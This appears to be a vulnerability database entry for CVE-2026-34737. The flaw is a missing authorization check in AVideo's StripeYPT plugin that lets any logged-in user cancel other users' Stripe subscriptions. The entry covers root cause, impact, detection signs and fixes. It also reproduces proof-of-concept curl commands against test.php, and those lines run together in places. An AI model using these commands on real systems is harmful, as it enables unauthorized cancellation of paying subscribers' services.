
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-34737 is a missing authorization vulnerability in the StripeYPT plugin of WWBN AVideo, an open source video platform. It affects AVideo versions 26.0 and prior, allowing any authenticated (non-admin) user to cancel arbitrary Stripe subscriptions by submitting a crafted payload to an exposed debug endpoint. The vulnerability was published on March 30–31, 2026, and discovered by aisafe.io. It carries a CVSS v3.1 base score of 6.5 (Medium) (GitHub Advisory, Github Advisory).
The root cause is a missing authorization check (CWE-862) in the StripeYPT plugin's test.php debug endpoint, which verifies only that a user is logged in (User::isLogged()) rather than requiring admin privileges (User::isAdmin()). The endpoint accepts Stripe webhook-style JSON payloads via $_REQUEST['payload'] and passes them through StripeYPT::getMetadataOrFromSubscription(), which ultimately calls retrieveSubscriptions(). A logic bug at StripeYPT.php:933 causes retrieveSubscriptions() to invoke $sub->cancel() on the Stripe API instead of merely fetching subscription data, resulting in actual subscription cancellation. This same bug also affects the production webhook handler processSubscriptionIPN(), broadening the attack surface beyond the debug endpoint (GitHub Advisory).
Any authenticated user on an affected AVideo instance can cancel arbitrary Stripe subscriptions belonging to other users or the platform operator by supplying a known or enumerated subscription ID. This results in direct financial harm to the platform (lost subscription revenue) and service disruption for paying subscribers who lose access to premium features. There is no confidentiality or availability impact at the system level, but the integrity of subscription state is fully compromised for any targeted subscription (GitHub Advisory, Github Advisory).
A proof-of-concept exploit is publicly available in the GitHub security advisory, consisting of concrete curl commands that any authenticated user can execute against a vulnerable instance. The EPSS score is approximately 0.014% (3rd percentile), indicating low current exploitation probability. There is no evidence of in-the-wild exploitation at this time, and the vulnerability has not been added to the CISA KEV catalog. No threat actor attribution has been reported (Github Advisory, GitHub Advisory).
PHPSESSID).curl -b "PHPSESSID=USER_SESSION" \
"https://your-avideo-instance.com/plugin/StripeYPT/listSubscriptions.php"{"data":{"object":{"id":"sub_TARGET_SUBSCRIPTION_ID","customer":"cus_CUSTOMER_ID"}}}test.php:curl -b "PHPSESSID=USER_SESSION" \
"https://your-avideo-instance.com/plugin/StripeYPT/test.php" \
-d 'payload={"data":{"object":{"id":"sub_TARGET_SUBSCRIPTION_ID","customer":"cus_CUSTOMER_ID"}}}'retrieveSubscriptions() calls $sub->cancel() against the Stripe API, and the target subscription is cancelled. The affected subscriber loses access to paid features (GitHub Advisory)./plugin/StripeYPT/test.php from non-administrative user sessions; unusual access to /plugin/StripeYPT/listSubscriptions.php by regular users.test.php with payload parameters containing Stripe subscription IDs (sub_*) from non-admin accounts; repeated requests with varying subscription IDs suggesting enumeration.getMetadataOrFromSubscription() or retrieveSubscriptions() calls triggered outside of normal webhook processing flows (GitHub Advisory).No official patched version was available at the time of initial publication (all versions ≤ 26.0 are affected); however, the GitHub advisory references a commit (WWBN/AVideo@8ac79b9) indicating a fix has since been applied — upgrade to a version newer than 26.0 as soon as available. Two code-level fixes are recommended: (1) change User::isLogged() to User::isAdmin() in plugin/StripeYPT/test.php:4 to restrict the debug endpoint to administrators only, and (2) remove the $sub->cancel() call from retrieveSubscriptions() at StripeYPT.php:933 so the method only retrieves subscription data. As an immediate workaround, disable the StripeYPT plugin if not actively needed, restrict access to test.php via web server configuration (e.g., deny all access), and review Stripe subscription logs for unauthorized cancellations to restore affected subscriptions (GitHub Advisory, Github Advisory).
The vulnerability was discovered and reported by aisafe.io and credited to researcher adrgs. It was published to the GitHub Advisory Database on April 1, 2026, and received standard automated tracking across CVE aggregators. No notable vendor statements beyond the advisory itself, significant researcher commentary, or major media coverage have been identified for this vulnerability.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."